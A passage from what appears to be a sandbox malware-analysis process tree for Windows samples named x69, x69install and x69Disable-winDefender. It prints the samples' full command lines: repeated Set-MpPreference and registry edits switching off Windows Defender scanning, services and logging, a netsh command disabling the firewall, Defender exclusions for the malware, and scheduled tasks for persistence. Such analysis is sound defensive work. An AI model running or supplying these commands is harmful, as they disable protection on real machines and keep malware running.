              "C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\923E.tmp\923E.tmp\924F.bat C:\Users\Admin\AppData\Roaming\x69Disable-winDefender.exe"
              4⤵
              • Suspicious use of WriteProcessMemory
              PID:5072
                • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                  powershell.exe -command "Set-MpPreference -DisableRealtimeMonitoring $true"
                  5⤵
                  • Command and Scripting Interpreter: PowerShell
                  • Suspicious behavior: EnumeratesProcesses
                  • Suspicious use of AdjustPrivilegeToken
                  PID:2168
                • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                  powershell.exe -command "Set-MpPreference -DisableBehaviorMonitoring $true"
                  5⤵
                  • Command and Scripting Interpreter: PowerShell
                  • Suspicious behavior: EnumeratesProcesses
                  • Suspicious use of AdjustPrivilegeToken
                  PID:5452
                • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                  powershell.exe -command "Set-MpPreference -DisableBlockAtFirstSeen $true"
                  5⤵
                  • Command and Scripting Interpreter: PowerShell
                  • Suspicious behavior: EnumeratesProcesses
                  • Suspicious use of AdjustPrivilegeToken
                  PID:4704
                • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                  powershell.exe -command "Set-MpPreference -DisableIOAVProtection $true"
                  5⤵
                  • Command and Scripting Interpreter: PowerShell
                  • Suspicious behavior: EnumeratesProcesses
                  • Suspicious use of AdjustPrivilegeToken
                  PID:5244
                • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                  powershell.exe -command "Set-MpPreference -DisablePrivacyMode $true"
                  5⤵
                  • Command and Scripting Interpreter: PowerShell
                  • Suspicious behavior: EnumeratesProcesses
                  • Suspicious use of AdjustPrivilegeToken
                  PID:1596
                • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                  powershell.exe -command "Set-MpPreference -SignatureDisableUpdateOnStartupWithoutEngine $true"
                  5⤵
                  • Command and Scripting Interpreter: PowerShell
                  • Suspicious behavior: EnumeratesProcesses
                  • Suspicious use of AdjustPrivilegeToken
                  PID:4400
                • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                  powershell.exe -command "Set-MpPreference -DisableArchiveScanning $true"
                  5⤵
                  • Command and Scripting Interpreter: PowerShell
                  • Suspicious behavior: EnumeratesProcesses
                  • Suspicious use of AdjustPrivilegeToken
                  PID:4992
                • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                  powershell.exe -command "Set-MpPreference -DisableIntrusionPreventionSystem $true"
                  5⤵
                  • Command and Scripting Interpreter: PowerShell
                  • Suspicious behavior: EnumeratesProcesses
                  • Suspicious use of AdjustPrivilegeToken
                  PID:2900
                • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                  powershell.exe -command "Set-MpPreference -DisableScriptScanning $true"
                  5⤵
                  • Command and Scripting Interpreter: PowerShell
                  • Suspicious use of AdjustPrivilegeToken
                  PID:5904
                • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                  powershell.exe -command "Set-MpPreference -SubmitSamplesConsent 2"
                  5⤵
                  • Command and Scripting Interpreter: PowerShell
                  • Suspicious use of AdjustPrivilegeToken
                  PID:4912
                • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                  powershell.exe -command "Set-MpPreference -MAPSReporting 0"
                  5⤵
                  • Command and Scripting Interpreter: PowerShell
                  • Suspicious use of AdjustPrivilegeToken
                  PID:2584
                • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                  powershell.exe -command "Set-MpPreference -HighThreatDefaultAction 6 -Force"
                  5⤵
                  • Command and Scripting Interpreter: PowerShell
                  • Suspicious use of AdjustPrivilegeToken
                  PID:5300
                • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                  powershell.exe -command "Set-MpPreference -ModerateThreatDefaultAction 6"
                  5⤵
                  • Command and Scripting Interpreter: PowerShell
                  • Suspicious use of AdjustPrivilegeToken
                  PID:1764
                • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                  powershell.exe -command "Set-MpPreference -LowThreatDefaultAction 6"
                  5⤵
                  • Command and Scripting Interpreter: PowerShell
                  • Suspicious use of AdjustPrivilegeToken
                  PID:4048
                • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                  powershell.exe -command "Set-MpPreference -SevereThreatDefaultAction 6"
                  5⤵
                  • Command and Scripting Interpreter: PowerShell
                  • Suspicious use of AdjustPrivilegeToken
                  PID:5240
                • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                  powershell.exe -command "Reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender" /v DisableAntiSpyware /t REG_DWORD /d 1 /f"
                  5⤵
                  • Command and Scripting Interpreter: PowerShell
                  • Suspicious use of AdjustPrivilegeToken
                  PID:4388
                    • C:\Windows\system32\reg.exe
                      "C:\Windows\system32\reg.exe" add HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender /v DisableAntiSpyware /t REG_DWORD /d 1 /f
                      6⤵
                      PID:4348
                • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                  powershell.exe -command "REG ADD ΓÇ£hklm\software\policies\microsoft\windows defenderΓÇ¥ /v DisableAntiSpyware /t REG_DWORD /d 1 /f"
                  5⤵
                  • Command and Scripting Interpreter: PowerShell
                  • Suspicious use of AdjustPrivilegeToken
                  PID:388
                    • C:\Windows\system32\reg.exe
                      "C:\Windows\system32\reg.exe" ADD ΓÇ£hklm\software\policies\microsoft\windows defenderΓÇ¥ /v DisableAntiSpyware /t REG_DWORD /d 1 /f
                      6⤵
                      PID:1744
                • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                  powershell.exe -command "netsh advfirewall set allprofiles state off"
                  5⤵
                  • Command and Scripting Interpreter: PowerShell
                  • Suspicious use of AdjustPrivilegeToken
                  PID:2796
                    • C:\Windows\system32\netsh.exe
                      "C:\Windows\system32\netsh.exe" advfirewall set allprofiles state off
                      6⤵
                      • Modifies Windows Firewall
                      • Event Triggered Execution: Netsh Helper DLL
                      PID:4064
                • C:\Windows\system32\reg.exe
                  reg delete "HKLM\Software\Policies\Microsoft\Windows Defender" /f
                  5⤵
                  PID:5000
                • C:\Windows\system32\reg.exe
                  reg add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d "1" /f
                  5⤵
                  • Modifies Windows Defender DisableAntiSpyware settings
                  PID:1740
                • C:\Windows\system32\reg.exe
                  reg add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiVirus" /t REG_DWORD /d "1" /f
                  5⤵
                  PID:2412
                • C:\Windows\system32\reg.exe
                  reg add "HKLM\Software\Policies\Microsoft\Windows Defender\MpEngine" /v "MpEnablePus" /t REG_DWORD /d "0" /f
                  5⤵
                  PID:2972
                • C:\Windows\system32\reg.exe
                  reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableBehaviorMonitoring" /t REG_DWORD /d "1" /f
                  5⤵
                  • Modifies Windows Defender Real-time Protection settings
                  PID:4808
                • C:\Windows\system32\reg.exe
                  reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableIOAVProtection" /t REG_DWORD /d "1" /f
                  5⤵
                  • Modifies Windows Defender Real-time Protection settings
                  PID:4216
                • C:\Windows\system32\reg.exe
                  reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableOnAccessProtection" /t REG_DWORD /d "1" /f
                  5⤵
                  • Modifies Windows Defender Real-time Protection settings
                  PID:4916
                • C:\Windows\system32\reg.exe
                  reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d "1" /f
                  5⤵
                  • Modifies Windows Defender Real-time Protection settings
                  PID:1852
                • C:\Windows\system32\reg.exe
                  reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableScanOnRealtimeEnable" /t REG_DWORD /d "1" /f
                  5⤵
                  • Modifies Windows Defender Real-time Protection settings
                  PID:5876
                • C:\Windows\system32\reg.exe
                  reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Reporting" /v "DisableEnhancedNotifications" /t REG_DWORD /d "1" /f
                  5⤵
                  PID:6072
                • C:\Windows\system32\reg.exe
                  reg add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "DisableBlockAtFirstSeen" /t REG_DWORD /d "1" /f
                  5⤵
                  PID:2020
                • C:\Windows\system32\reg.exe
                  reg add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SpynetReporting" /t REG_DWORD /d "0" /f
                  5⤵
                                                                                                                  PID:4816
                                                                                                                • C:\Windows\system32\reg.exe
                                                                                                                  reg add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SubmitSamplesConsent" /t REG_DWORD /d "2" /f
                                                                                                                  5⤵
                                                                                                                    PID:3880
                                                                                                                  • C:\Windows\system32\reg.exe
                                                                                                                    reg add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderApiLogger" /v "Start" /t REG_DWORD /d "0" /f
                                                                                                                    5⤵
                                                                                                                      PID:4824
                                                                                                                    • C:\Windows\system32\reg.exe
                                                                                                                      reg add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderAuditLogger" /v "Start" /t REG_DWORD /d "0" /f
                                                                                                                      5⤵
                                                                                                                        PID:4660
                                                                                                                      • C:\Windows\system32\schtasks.exe
                                                                                                                        schtasks /Change /TN "Microsoft\Windows\ExploitGuard\ExploitGuard MDM policy Refresh" /Disable
                                                                                                                        5⤵
                                                                                                                          PID:3040
                                                                                                                        • C:\Windows\system32\schtasks.exe
                                                                                                                          schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cache Maintenance" /Disable
                                                                                                                          5⤵
                                                                                                                            PID:920
                                                                                                                          • C:\Windows\system32\schtasks.exe
                                                                                                                            schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cleanup" /Disable
                                                                                                                            5⤵
                                                                                                                              PID:4524
                                                                                                                            • C:\Windows\system32\schtasks.exe
                                                                                                                              schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Scheduled Scan" /Disable
                                                                                                                              5⤵
                                                                                                                                PID:5580
                                                                                                                              • C:\Windows\system32\schtasks.exe
                                                                                                                                schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Verification" /Disable
                                                                                                                                5⤵
                                                                                                                                  PID:4380
                                                                                                                                • C:\Windows\system32\reg.exe
                                                                                                                                  reg delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\StartupApproved\Run" /v "SecurityHealth" /f
                                                                                                                                  5⤵
                                                                                                                                    PID:1944
                                                                                                                                  • C:\Windows\system32\reg.exe
                                                                                                                                    reg delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Run" /v "SecurityHealth" /f
                                                                                                                                    5⤵
                                                                                                                                      PID:5532
                                                                                                                                    • C:\Windows\system32\reg.exe
                                                                                                                                      reg delete "HKCR\*\shellex\ContextMenuHandlers\EPP" /f
                                                                                                                                      5⤵
                                                                                                                                        PID:2388
                                                                                                                                      • C:\Windows\system32\reg.exe
                                                                                                                                        reg delete "HKCR\Directory\shellex\ContextMenuHandlers\EPP" /f
                                                                                                                                        5⤵
                                                                                                                                          PID:5540
                                                                                                                                        • C:\Windows\system32\reg.exe
                                                                                                                                          reg delete "HKCR\Drive\shellex\ContextMenuHandlers\EPP" /f
                                                                                                                                          5⤵
                                                                                                                                            PID:3964
                                                                                                                                          • C:\Windows\system32\reg.exe
                                                                                                                                            reg add "HKLM\System\CurrentControlSet\Services\WdBoot" /v "Start" /t REG_DWORD /d "4" /f
                                                                                                                                            5⤵
                                                                                                                                            • Modifies Security services
                                                                                                                                            PID:3160
                                                                                                                                          • C:\Windows\system32\reg.exe
                                                                                                                                            reg add "HKLM\System\CurrentControlSet\Services\WdFilter" /v "Start" /t REG_DWORD /d "4" /f
                                                                                                                                            5⤵
                                                                                                                                            • Modifies Security services
                                                                                                                                            PID:1984
                                                                                                                                          • C:\Windows\system32\reg.exe
                                                                                                                                            reg add "HKLM\System\CurrentControlSet\Services\WdNisDrv" /v "Start" /t REG_DWORD /d "4" /f
                                                                                                                                            5⤵
                                                                                                                                            • Modifies Security services
                                                                                                                                            PID:436
                                                                                                                                          • C:\Windows\system32\reg.exe
                                                                                                                                            reg add "HKLM\System\CurrentControlSet\Services\WdNisSvc" /v "Start" /t REG_DWORD /d "4" /f
                                                                                                                                            5⤵
                                                                                                                                            • Modifies Security services
                                                                                                                                            PID:4340
                                                                                                                                          • C:\Windows\system32\reg.exe
                                                                                                                                            reg add "HKLM\System\CurrentControlSet\Services\WinDefend" /v "Start" /t REG_DWORD /d "4" /f
                                                                                                                                            5⤵
                                                                                                                                            • Modifies security service
                                                                                                                                            PID:2296
                                                                                                                                      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\x69install.exe'
                                                                                                                                        3⤵
                                                                                                                                        • Command and Scripting Interpreter: PowerShell
                                                                                                                                        • Suspicious behavior: EnumeratesProcesses
                                                                                                                                        • Suspicious use of AdjustPrivilegeToken
                                                                                                                                        PID:3268
                                                                                                                                      • C:\Windows\System32\schtasks.exe
                                                                                                                                        "C:\Windows\System32\schtasks.exe" /Create /F /TN "x69install" /SC ONLOGON /TR "C:\Users\Admin\AppData\Roaming\x69install.exe" /RL HIGHEST
                                                                                                                                        3⤵
                                                                                                                                        • Scheduled Task/Job: Scheduled Task
                                                                                                                                        PID:5584
                                                                                                                                      • C:\Users\Admin\AppData\Roaming\x69install.exe
                                                                                                                                        "C:\Users\Admin\AppData\Roaming\x69install.exe"
                                                                                                                                        3⤵
                                                                                                                                        • Executes dropped EXE
                                                                                                                                        • System Location Discovery: System Language Discovery
                                                                                                                                        • Suspicious use of WriteProcessMemory
                                                                                                                                        PID:4588
                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\iyMbXS.exe
                                                                                                                                          C:\Users\Admin\AppData\Local\Temp\iyMbXS.exe
                                                                                                                                          4⤵
                                                                                                                                          • Checks computer location settings
                                                                                                                                          • Executes dropped EXE
                                                                                                                                          • Drops file in Program Files directory
                                                                                                                                          • System Location Discovery: System Language Discovery
                                                                                                                                          PID:4472
                                                                                                                                          • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                            C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\18f81da6.bat" "
                                                                                                                                            5⤵
                                                                                                                                            • System Location Discovery: System Language Discovery
                                                                                                                                            PID:4812
                                                                                                                                    • C:\Windows\system32\cmd.exe
                                                                                                                                      C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\x69.exe
                                                                                                                                      2⤵
                                                                                                                                      • Suspicious use of WriteProcessMemory
                                                                                                                                      PID:1520
                                                                                                                                      • C:\Windows\System32\Conhost.exe
                                                                                                                                        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                        3⤵
                                                                                                                                          PID:4984
                                                                                                                                        • C:\Users\Admin\AppData\Roaming\x69.exe
                                                                                                                                          C:\Users\Admin\AppData\Roaming\x69.exe
                                                                                                                                          3⤵
                                                                                                                                          • Checks computer location settings
                                                                                                                                          • Drops startup file
                                                                                                                                          • Executes dropped EXE
                                                                                                                                          • Adds Run key to start application
                                                                                                                                          • Suspicious behavior: AddClipboardFormatListener
                                                                                                                                          • Suspicious use of AdjustPrivilegeToken
                                                                                                                                          • Suspicious use of WriteProcessMemory
                                                                                                                                          PID:1008
                                                                                                                                          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                            "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\x69.exe'
                                                                                                                                            4⤵
                                                                                                                                            • Command and Scripting Interpreter: PowerShell
                                                                                                                                            • Suspicious behavior: EnumeratesProcesses
                                                                                                                                            • Suspicious use of AdjustPrivilegeToken
                                                                                                                                            PID:2508
                                                                                                                                          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                            "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'x69.exe'
                                                                                                                                            4⤵
                                                                                                                                            • Command and Scripting Interpreter: PowerShell
                                                                                                                                            • Suspicious behavior: EnumeratesProcesses
                                                                                                                                            • Suspicious use of AdjustPrivilegeToken
                                                                                                                                            PID:5888
                                                                                                                                          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                            "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\x69.exe'
                                                                                                                                            4⤵
                                                                                                                                            • Command and Scripting Interpreter: PowerShell
                                                                                                                                            • Suspicious behavior: EnumeratesProcesses
                                                                                                                                            • Suspicious use of AdjustPrivilegeToken
                                                                                                                                            PID:5772
                                                                                                                                          • C:\Windows\System32\schtasks.exe
                                                                                                                                            "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "x69" /tr "C:\Users\Admin\AppData\Roaming\x69.exe"
                                                                                                                                            4⤵
                                                                                                                                            • Scheduled Task/Job: Scheduled Task
                                                                                                                                            PID:4724
                                                                                                                                      • C:\Windows\system32\cmd.exe
                                                                                                                                        C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\x69Disable-winDefender.exe
                                                                                                                                        2⤵
                                                                                                                                        • Suspicious use of WriteProcessMemory
                                                                                                                                        PID:3576
                                                                                                                                        • C:\Users\Admin\AppData\Roaming\x69Disable-winDefender.exe
                                                                                                                                          C:\Users\Admin\AppData\Roaming\x69Disable-winDefender.exe
                                                                                                                                          3⤵
                                                                                                                                          • Checks computer location settings
                                                                                                                                          • Executes dropped EXE
                                                                                                                                          • System Location Discovery: System Language Discovery
                                                                                                                                          • Suspicious use of WriteProcessMemory
                                                                                                                                          PID:4844
                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\izTLZKj.exe
                                                                                                                                            C:\Users\Admin\AppData\Local\Temp\izTLZKj.exe
                                                                                                                                            4⤵
                                                                                                                                            • Checks computer location settings
                                                                                                                                            • Executes dropped EXE
                                                                                                                                            • Drops file in Program Files directory
                                                                                                                                            • System Location Discovery: System Language Discovery
                                                                                                                                            PID:640
                                                                                                                                            • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                              C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\45fa18db.bat" "
                                                                                                                                              5⤵
                                                                                                                                              • System Location Discovery: System Language Discovery
                                                                                                                                              PID:2716
                                                                                                                                              • C:\Windows\System32\Conhost.exe
                                                                                                                                                \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                6⤵
                                                                                                                                                  PID:3912
                                                                                                                                            • C:\Windows\system32\cmd.exe
                                                                                                                                              "C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\923D.tmp\923E.tmp\923F.bat C:\Users\Admin\AppData\Roaming\x69Disable-winDefender.exe"
                                                                                                                                              4⤵
                                                                                                                                              • Suspicious use of WriteProcessMemory
                                                                                                                                              PID:3852
                                                                                                                                              • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                powershell.exe -command "Set-MpPreference -DisableRealtimeMonitoring $true"
                                                                                                                                                5⤵
                                                                                                                                                • Command and Scripting Interpreter: PowerShell
                                                                                                                                                • Suspicious behavior: EnumeratesProcesses
                                                                                                                                                • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                PID:4852
                                                                                                                                              • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                powershell.exe -command "Set-MpPreference -DisableBehaviorMonitoring $true"
                                                                                                                                                5⤵
                                                                                                                                                • Command and Scripting Interpreter: PowerShell
                                                                                                                                                • Suspicious behavior: EnumeratesProcesses
                                                                                                                                                • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                PID:3720
                                                                                                                                              • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                powershell.exe -command "Set-MpPreference -DisableBlockAtFirstSeen $true"
                                                                                                                                                5⤵
                                                                                                                                                • Command and Scripting Interpreter: PowerShell
                                                                                                                                                • Suspicious behavior: EnumeratesProcesses
                                                                                                                                                • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                PID:3700
                                                                                                                                              • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                powershell.exe -command "Set-MpPreference -DisableIOAVProtection $true"
                                                                                                                                                5⤵
                                                                                                                                                • Command and Scripting Interpreter: PowerShell
                                                                                                                                                • Suspicious behavior: EnumeratesProcesses
                                                                                                                                                • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                PID:1276
                                                                                                                                              • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                powershell.exe -command "Set-MpPreference -DisablePrivacyMode $true"
                                                                                                                                                5⤵
                                                                                                                                                • Command and Scripting Interpreter: PowerShell
                                                                                                                                                • Suspicious behavior: EnumeratesProcesses
                                                                                                                                                • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                PID:2896
                                                                                                                                              • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                powershell.exe -command "Set-MpPreference -SignatureDisableUpdateOnStartupWithoutEngine $true"
                                                                                                                                                5⤵
                                                                                                                                                • Command and Scripting Interpreter: PowerShell
                                                                                                                                                • Suspicious behavior: EnumeratesProcesses
                                                                                                                                                • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                PID:2664
                                                                                                                                              • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                powershell.exe -command "Set-MpPreference -DisableArchiveScanning $true"
                                                                                                                                                5⤵
                                                                                                                                                • Command and Scripting Interpreter: PowerShell
                                                                                                                                                • Suspicious behavior: EnumeratesProcesses
                                                                                                                                                • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                PID:1576
                                                                                                                                              • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                powershell.exe -command "Set-MpPreference -DisableIntrusionPreventionSystem $true"
                                                                                                                                                5⤵
                                                                                                                                                • Command and Scripting Interpreter: PowerShell
                                                                                                                                                • Suspicious behavior: EnumeratesProcesses
                                                                                                                                                • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                PID:4848
                                                                                                                                              • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                powershell.exe -command "Set-MpPreference -DisableScriptScanning $true"
                                                                                                                                                5⤵
                                                                                                                                                • Command and Scripting Interpreter: PowerShell
                                                                                                                                                • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                PID:3428
                                                                                                                                              • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                powershell.exe -command "Set-MpPreference -SubmitSamplesConsent 2"
                                                                                                                                                5⤵
                                                                                                                                                • Command and Scripting Interpreter: PowerShell
                                                                                                                                                • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                PID:948
                                                                                                                                              • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                powershell.exe -command "Set-MpPreference -MAPSReporting 0"
                                                                                                                                                5⤵
                                                                                                                                                • Command and Scripting Interpreter: PowerShell
                                                                                                                                                • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                PID:3108
                                                                                                                                              • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                powershell.exe -command "Set-MpPreference -HighThreatDefaultAction 6 -Force"
                                                                                                                                                5⤵
                                                                                                                                                • Command and Scripting Interpreter: PowerShell
                                                                                                                                                • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                PID:2664
                                                                                                                                              • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                powershell.exe -command "Set-MpPreference -ModerateThreatDefaultAction 6"
                                                                                                                                                5⤵
                                                                                                                                                • Command and Scripting Interpreter: PowerShell
                                                                                                                                                • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                PID:1612
                                                                                                                                              • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                powershell.exe -command "Set-MpPreference -LowThreatDefaultAction 6"
                                                                                                                                                5⤵
                                                                                                                                                • Command and Scripting Interpreter: PowerShell
                                                                                                                                                • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                PID:5664
                                                                                                                                              • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                powershell.exe -command "Set-MpPreference -SevereThreatDefaultAction 6"
                                                                                                                                                5⤵
                                                                                                                                                • Command and Scripting Interpreter: PowerShell
                                                                                                                                                • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                PID:1672
                                                                                                                                              • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                powershell.exe -command "Reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender" /v DisableAntiSpyware /t REG_DWORD /d 1 /f"
                                                                                                                                                5⤵
                                                                                                                                                • Command and Scripting Interpreter: PowerShell
                                                                                                                                                • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                PID:5584
                                                                                                                                                • C:\Windows\system32\reg.exe
                                                                                                                                                  "C:\Windows\system32\reg.exe" add HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender /v DisableAntiSpyware /t REG_DWORD /d 1 /f
                                                                                                                                                  6⤵
                                                                                                                                                    PID:5900
                                                                                                                                                • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                  powershell.exe -command "REG ADD ΓÇ£hklm\software\policies\microsoft\windows defenderΓÇ¥ /v DisableAntiSpyware /t REG_DWORD /d 1 /f"
                                                                                                                                                  5⤵
                                                                                                                                                  • Command and Scripting Interpreter: PowerShell
                                                                                                                                                  • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                  PID:3744
                                                                                                                                                  • C:\Windows\system32\reg.exe
                                                                                                                                                    "C:\Windows\system32\reg.exe" ADD ΓÇ£hklm\software\policies\microsoft\windows defenderΓÇ¥ /v DisableAntiSpyware /t REG_DWORD /d 1 /f
                                                                                                                                                    6⤵
                                                                                                                                                      PID:5812
                                                                                                                                                  • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                    powershell.exe -command "netsh advfirewall set allprofiles state off"
                                                                                                                                                    5⤵
                                                                                                                                                    • Command and Scripting Interpreter: PowerShell
                                                                                                                                                    • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                    PID:4128
                                                                                                                                                    • C:\Windows\system32\netsh.exe
                                                                                                                                                      "C:\Windows\system32\netsh.exe" advfirewall set allprofiles state off
                                                                                                                                                      6⤵
                                                                                                                                                      • Modifies Windows Firewall
                                                                                                                                                      • Event Triggered Execution: Netsh Helper DLL
                                                                                                                                                      PID:4428
                                                                                                                                                  • C:\Windows\system32\reg.exe
                                                                                                                                                    reg delete "HKLM\Software\Policies\Microsoft\Windows Defender" /f
                                                                                                                                                    5⤵
                                                                                                                                                      PID:2168
                                                                                                                                                    • C:\Windows\system32\reg.exe
                                                                                                                                                      reg add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d "1" /f
                                                                                                                                                      5⤵
                                                                                                                                                      • Modifies Windows Defender DisableAntiSpyware settings
                                                                                                                                                      PID:4852
                                                                                                                                                    • C:\Windows\system32\reg.exe
                                                                                                                                                      reg add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiVirus" /t REG_DWORD /d "1" /f
                                                                                                                                                      5⤵
                                                                                                                                                        PID:2728
                                                                                                                                                      • C:\Windows\system32\reg.exe
                                                                                                                                                        reg add "HKLM\Software\Policies\Microsoft\Windows Defender\MpEngine" /v "MpEnablePus" /t REG_DWORD /d "0" /f
                                                                                                                                                        5⤵
                                                                                                                                                          PID:5804
                                                                                                                                                        • C:\Windows\system32\reg.exe
          reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableBehaviorMonitoring" /t REG_DWORD /d "1" /f
          5⤵
          • Modifies Windows Defender Real-time Protection settings
          PID:2052
        • C:\Windows\system32\reg.exe
          reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableIOAVProtection" /t REG_DWORD /d "1" /f
          5⤵
          • Modifies Windows Defender Real-time Protection settings
          PID:4528
        • C:\Windows\system32\reg.exe
          reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableOnAccessProtection" /t REG_DWORD /d "1" /f
          5⤵
          • Modifies Windows Defender Real-time Protection settings
          PID:3484
        • C:\Windows\system32\reg.exe
          reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d "1" /f
          5⤵
          • Modifies Windows Defender Real-time Protection settings
          PID:2376
        • C:\Windows\system32\reg.exe
          reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableScanOnRealtimeEnable" /t REG_DWORD /d "1" /f
          5⤵
